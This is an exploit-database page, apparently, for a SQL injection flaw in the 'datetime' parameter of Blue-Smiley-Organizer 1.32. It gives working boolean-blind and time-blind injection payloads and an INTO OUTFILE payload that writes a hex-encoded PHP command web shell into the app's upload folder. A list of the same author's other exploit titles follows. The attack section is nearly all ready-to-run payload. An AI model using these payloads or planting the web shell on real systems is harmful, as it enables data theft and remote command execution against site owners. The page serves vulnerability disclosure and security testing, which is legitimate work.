Menu

Search for hundreds of thousands of exploits

"delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection"

Author

Exploit author

cakes

Platform

Exploit platform

php

Release date

Exploit published date

2019-10-28

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Exploit Title: delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: https://github.com/delpino73/Blue-Smiley-Organizer
Software Link: https://github.com/delpino73/Blue-Smiley-Organizer.git
Version: 1.32
Tested on: CentOS7
CVE : N/A

# PoC: Multiple SQL Injection vulnerabilities
# Nice and easy SQL Injection
    
Parameter: datetime (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: datetime=2019-10-27 10:53:00' AND 6315=(SELECT (CASE WHEN (6315=6315) THEN 6315 ELSE (SELECT 3012 UNION SELECT 2464) END))-- sQtq&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
    Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: datetime=2019-10-27 10:53:00' AND (SELECT 7239 FROM (SELECT(SLEEP(5)))wrOx)-- cDKQ&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
  
  
# Pop a PHP CMD Shell
  
' LIMIT 0,1 INTO OUTFILE '/Path/To/Folder/upload/exec.php' LINES TERMINATED BY 0x3c3f7068702024636d64203d207368656c6c5f6578656328245f4745545b27636d64275d293b206563686f2024636d643b203f3e-- -
Release Date Title Type Platform Author
2019-11-05 "rimbalinux AhadPOS 1.11 - 'alamatCustomer' SQL Injection" webapps php cakes
2019-11-05 "thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting" webapps php cakes
2019-11-05 "thejshen Globitek CMS 1.4 - 'id' SQL Injection" webapps php cakes
2019-11-05 "html5_snmp 1.11 - 'Router_ID' SQL Injection" webapps php cakes
2019-11-05 "html5_snmp 1.11 - 'Remark' Persistent Cross-Site Scripting" webapps php cakes
2019-11-01 "TheJshen contentManagementSystem 1.04 - 'id' SQL Injection" webapps php cakes
2019-10-28 "waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting" webapps php cakes
2019-10-28 "delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection" webapps php cakes
2019-10-28 "waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection" webapps php cakes
2019-10-17 "WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path" local windows cakes
2019-10-16 "LiteManager 4.5.0 - 'romservice' Unquoted Serive Path" local windows cakes
2019-10-16 "Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path" local windows cakes
2019-10-16 "Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path" local windows cakes
2019-10-15 "ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path" local windows cakes
2019-09-26 "citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection" webapps php cakes
2019-09-19 "GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting" webapps php cakes
2019-09-18 "Hospital-Management 1.26 - 'fname' SQL Injection" webapps php cakes
2019-09-16 "CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection" webapps php cakes
2019-09-14 "College-Management-System 1.2 - Authentication Bypass" webapps php cakes
2019-09-14 "Ticket-Booking 1.4 - Authentication Bypass" webapps php cakes
2019-09-03 "FileThingie 2.5.7 - Arbitrary File Upload" webapps php cakes
2018-10-06 "Chamilo LMS 1.11.8 - 'firstname' Cross-Site Scripting" webapps php cakes
2018-10-05 "Chamilo LMS 1.11.8 - Cross-Site Scripting" webapps php cakes
2018-10-05 "Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)" webapps hardware cakes
2018-10-01 "Billion ADSL Router 400G 20151105641 - Cross-Site Scripting" webapps hardware cakes
2018-09-17 "Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)" dos hardware cakes
2018-09-17 "Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting" webapps hardware cakes
2018-08-31 "Vox TG790 ADSL Router - Cross-Site Scripting" webapps hardware cakes
2018-08-24 "Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)" webapps hardware cakes
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.